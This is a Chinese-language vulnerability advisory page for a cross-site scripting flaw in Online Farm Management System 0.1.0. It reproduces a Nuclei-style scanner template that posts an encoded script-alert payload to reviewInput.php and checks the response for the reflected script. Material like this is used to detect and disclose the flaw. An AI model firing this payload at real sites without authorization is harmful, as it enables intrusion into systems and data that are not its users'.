onlinefarm-management-xss: Online Farm Management System 0.1.0 - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: Online Farm Management System | POC: 已公开

漏洞描述

Online Farm Management System 0.1.0 contains a cross-site scripting vulnerability via the review.php file.

PoC代码[已公开]

id: onlinefarm-management-xss

info:
  name: Online Farm Management System 0.1.0 - Cross-Site Scripting
  author: arafatansari
  severity: high
  description: |
    Online Farm Management System 0.1.0 contains a cross-site scripting vulnerability via the review.php file.
  reference:
    - https://www.exploit-db.com/exploits/48673
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  metadata:
    verified: true
    max-request: 1
  tags: onlinefarm,cms,xss,edb,vuln

http:
  - raw:
      - |
        POST /reviewInput.php?pid=1 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        comment=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&rating=0

    host-redirects: true
    max-redirects: 2

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<em style="color: black;"><script>alert(document.domain)</script>'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 490a0046304402204b0b1da01374c804bdb169e427db816c78bea2ceddd155bf698b46b4dd7519d802207b2258e297ab6f1c7ee2cfc02894796f52d2f3839c17f5ff3b1467257f585537:922c64590222798bb761d5b6d8e72950

相关漏洞推荐